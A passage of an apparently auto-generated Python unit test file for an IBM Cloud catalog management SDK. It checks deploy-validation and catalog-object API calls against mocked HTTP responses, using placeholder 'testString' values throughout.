content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
namespace = 'testString'
# Invoke method
response = _service.get_preinstall(
version_loc_id,
x_auth_refresh_token,
cluster_id=cluster_id,
region=region,
namespace=namespace,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'cluster_id={}'.format(cluster_id) in query_string
assert 'region={}'.format(region) in query_string
assert 'namespace={}'.format(namespace) in query_string
@responses.activate
def test_get_preinstall_required_params(self):
"""
test_get_preinstall_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
mock_response = '{"metadata": {"cluster_id": "cluster_id", "region": "region", "namespace": "namespace", "workspace_id": "workspace_id", "workspace_name": "workspace_name"}, "release": {"deployments": [{"mapKey": {"anyKey": "anyValue"}}], "replicasets": [{"mapKey": {"anyKey": "anyValue"}}], "statefulsets": [{"mapKey": {"anyKey": "anyValue"}}], "pods": [{"mapKey": {"anyKey": "anyValue"}}], "errors": [{"mapKey": "inner"}]}, "content_mgmt": {"pods": [{"mapKey": "inner"}], "errors": [{"mapKey": "inner"}]}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.get_preinstall(
version_loc_id,
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_preinstall_value_error(self):
"""
test_get_preinstall_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
mock_response = '{"metadata": {"cluster_id": "cluster_id", "region": "region", "namespace": "namespace", "workspace_id": "workspace_id", "workspace_name": "workspace_name"}, "release": {"deployments": [{"mapKey": {"anyKey": "anyValue"}}], "replicasets": [{"mapKey": {"anyKey": "anyValue"}}], "statefulsets": [{"mapKey": {"anyKey": "anyValue"}}], "pods": [{"mapKey": {"anyKey": "anyValue"}}], "errors": [{"mapKey": "inner"}]}, "content_mgmt": {"pods": [{"mapKey": "inner"}], "errors": [{"mapKey": "inner"}]}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_preinstall(**req_copy)
class TestValidateInstall():
"""
Test Class for validate_install
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_validate_install_all_params(self):
"""
validate_install()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
responses.add(responses.POST,
url,
status=202)
# Construct a dict representation of a DeployRequestBodySchematics model
deploy_request_body_schematics_model = {}
deploy_request_body_schematics_model['name'] = 'testString'
deploy_request_body_schematics_model['description'] = 'testString'
deploy_request_body_schematics_model['tags'] = ['testString']
deploy_request_body_schematics_model['resource_group_id'] = 'testString'
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
namespace = 'testString'
override_values = {}
entitlement_apikey = 'testString'
schematics = deploy_request_body_schematics_model
script = 'testString'
script_id = 'testString'
version_locator_id = 'testString'
vcenter_id = 'testString'
vcenter_user = 'testString'
vcenter_password = 'testString'
vcenter_location = 'testString'
vcenter_datastore = 'testString'
# Invoke method
response = _service.validate_install(
version_loc_id,
x_auth_refresh_token,
cluster_id=cluster_id,
region=region,
namespace=namespace,
override_values=override_values,
entitlement_apikey=entitlement_apikey,
schematics=schematics,
script=script,
script_id=script_id,
version_locator_id=version_locator_id,
vcenter_id=vcenter_id,
vcenter_user=vcenter_user,
vcenter_password=vcenter_password,
vcenter_location=vcenter_location,
vcenter_datastore=vcenter_datastore,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['cluster_id'] == 'testString'
assert req_body['region'] == 'testString'
assert req_body['namespace'] == 'testString'
assert req_body['override_values'] == {}
assert req_body['entitlement_apikey'] == 'testString'
assert req_body['schematics'] == deploy_request_body_schematics_model
assert req_body['script'] == 'testString'
assert req_body['script_id'] == 'testString'
assert req_body['version_locator_id'] == 'testString'
assert req_body['vcenter_id'] == 'testString'
assert req_body['vcenter_user'] == 'testString'
assert req_body['vcenter_password'] == 'testString'
assert req_body['vcenter_location'] == 'testString'
assert req_body['vcenter_datastore'] == 'testString'
@responses.activate
def test_validate_install_required_params(self):
"""
test_validate_install_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.validate_install(
version_loc_id,
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_validate_install_value_error(self):
"""
test_validate_install_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.validate_install(**req_copy)
class TestGetValidationStatus():
"""
Test Class for get_validation_status
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_validation_status_all_params(self):
"""
get_validation_status()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
mock_response = '{"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.get_validation_status(
version_loc_id,
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_validation_status_value_error(self):
"""
test_get_validation_status_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/validation/install')
mock_response = '{"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_validation_status(**req_copy)
class TestGetOverrideValues():
"""
Test Class for get_override_values
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_override_values_all_params(self):
"""
get_override_values()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/validation/overridevalues')
mock_response = '{"mapKey": {"anyKey": "anyValue"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.get_override_values(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_override_values_value_error(self):
"""
test_get_override_values_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/validation/overridevalues')
mock_response = '{"mapKey": {"anyKey": "anyValue"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_override_values(**req_copy)
# endregion
##############################################################################
# End of Service: Deploy
##############################################################################
##############################################################################
# Start of Service: Objects
##############################################################################
# region
class TestSearchObjects():
"""
Test Class for search_objects
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_search_objects_all_params(self):
"""
search_objects()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/objects')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
query = 'testString'
limit = 1000
offset = 38
collapse = True
digest = True
# Invoke method
response = _service.search_objects(
query,
limit=limit,
offset=offset,
collapse=collapse,
digest=digest,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'query={}'.format(query) in query_string
assert 'limit={}'.format(limit) in query_string
assert 'offset={}'.format(offset) in query_string
assert 'collapse={}'.format('true' if collapse else 'false') in query_string
assert 'digest={}'.format('true' if digest else 'false') in query_string
@responses.activate
def test_search_objects_required_params(self):
"""
test_search_objects_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/objects')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
query = 'testString'
# Invoke method
response = _service.search_objects(
query,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'query={}'.format(query) in query_string
@responses.activate
def test_search_objects_value_error(self):
"""
test_search_objects_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/objects')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
query = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"query": query,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.search_objects(**req_copy)
class TestListObjects():
"""
Test Class for list_objects
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_list_objects_all_params(self):
"""
list_objects()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
limit = 1000
offset = 38
name = 'testString'
sort = 'testString'
# Invoke method
response = _service.list_objects(
catalog_identifier,
limit=limit,
offset=offset,
name=name,
sort=sort,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'limit={}'.format(limit) in query_string
assert 'offset={}'.format(offset) in query_string
assert 'name={}'.format(name) in query_string
assert 'sort={}'.format(sort) in query_string
@responses.activate
def test_list_objects_required_params(self):
"""
test_list_objects_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Invoke method
response = _service.list_objects(
catalog_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_list_objects_value_error(self):
"""
test_list_objects_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.list_objects(**req_copy)
class TestCreateObject():
"""
Test Class for create_object
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_create_object_all_params(self):
"""
create_object()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Construct a dict representation of a PublishObject model
publish_object_model = {}
publish_object_model['permit_ibm_public_publish'] = True
publish_object_model['ibm_approved'] = True
publish_object_model['public_approved'] = True
publish_object_model['portal_approval_record'] = 'testString'
publish_object_model['portal_url'] = 'testString'
# Construct a dict representation of a State model
state_model = {}
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
# Set up parameter values
catalog_identifier = 'testString'
id = 'testString'
name = 'testString'
rev = 'testString'
crn = 'testString'
url = 'testString'
parent_id = 'testString'
label_i18n = 'testString'
label = 'testString'
tags = ['testString']
created = string_to_datetime('2019-01-01T12:00:00.000Z')
updated = string_to_datetime('2019-01-01T12:00:00.000Z')
short_description = 'testString'
short_description_i18n = 'testString'
kind = 'testString'
publish = publish_object_model
state = state_model
catalog_id = 'testString'
catalog_name = 'testString'
data = {}
# Invoke method
response = _service.create_object(
catalog_identifier,
id=id,
name=name,
rev=rev,
crn=crn,
url=url,
parent_id=parent_id,
label_i18n=label_i18n,
label=label,
tags=tags,
created=created,
updated=updated,
short_description=short_description,
short_description_i18n=short_description_i18n,
kind=kind,
publish=publish,
state=state,
catalog_id=catalog_id,
catalog_name=catalog_name,
data=data,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['id'] == 'testString'
assert req_body['name'] == 'testString'
assert req_body['_rev'] == 'testString'
assert req_body['crn'] == 'testString'
assert req_body['url'] == 'testString'
assert req_body['parent_id'] == 'testString'
assert req_body['label_i18n'] == 'testString'
assert req_body['label'] == 'testString'
assert req_body['tags'] == ['testString']
assert req_body['created'] == "2019-01-01T12:00:00Z"
assert req_body['updated'] == "2019-01-01T12:00:00Z"
assert req_body['short_description'] == 'testString'
assert req_body['short_description_i18n'] == 'testString'
assert req_body['kind'] == 'testString'
assert req_body['publish'] == publish_object_model
assert req_body['state'] == state_model
assert req_body['catalog_id'] == 'testString'
assert req_body['catalog_name'] == 'testString'
assert req_body['data'] == {}
@responses.activate
def test_create_object_required_params(self):
"""
test_create_object_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
# Invoke method
response = _service.create_object(
catalog_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
@responses.activate
def test_create_object_value_error(self):
"""
test_create_object_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects')
mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
catalog_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.create_object(**req_copy)
class TestGetObject():
"""
Test Class for get_object
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_object_all_params(self):
"""
get_object()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Invoke method
response = _service.get_object(
catalog_identifier,
object_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_object_value_error(self):
"""
test_get_object_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_object(**req_copy)
class TestReplaceObject():
"""
Test Class for replace_object
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_replace_object_all_params(self):
"""
replace_object()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Construct a dict representation of a PublishObject model
publish_object_model = {}
publish_object_model['permit_ibm_public_publish'] = True
publish_object_model['ibm_approved'] = True
publish_object_model['public_approved'] = True
publish_object_model['portal_approval_record'] = 'testString'
publish_object_model['portal_url'] = 'testString'
# Construct a dict representation of a State model
state_model = {}
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
id = 'testString'
name = 'testString'
rev = 'testString'
crn = 'testString'
url = 'testString'
parent_id = 'testString'
label_i18n = 'testString'
label = 'testString'
tags = ['testString']
created = string_to_datetime('2019-01-01T12:00:00.000Z')
updated = string_to_datetime('2019-01-01T12:00:00.000Z')
short_description = 'testString'
short_description_i18n = 'testString'
kind = 'testString'
publish = publish_object_model
state = state_model
catalog_id = 'testString'
catalog_name = 'testString'
data = {}
# Invoke method
response = _service.replace_object(
catalog_identifier,
object_identifier,
id=id,
name=name,
rev=rev,
crn=crn,
url=url,
parent_id=parent_id,
label_i18n=label_i18n,
label=label,
tags=tags,
created=created,
updated=updated,
short_description=short_description,
short_description_i18n=short_description_i18n,
kind=kind,
publish=publish,
state=state,
catalog_id=catalog_id,
catalog_name=catalog_name,
data=data,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['id'] == 'testString'
assert req_body['name'] == 'testString'
assert req_body['_rev'] == 'testString'
assert req_body['crn'] == 'testString'
assert req_body['url'] == 'testString'
assert req_body['parent_id'] == 'testString'
assert req_body['label_i18n'] == 'testString'
assert req_body['label'] == 'testString'
assert req_body['tags'] == ['testString']
assert req_body['created'] == "2019-01-01T12:00:00Z"
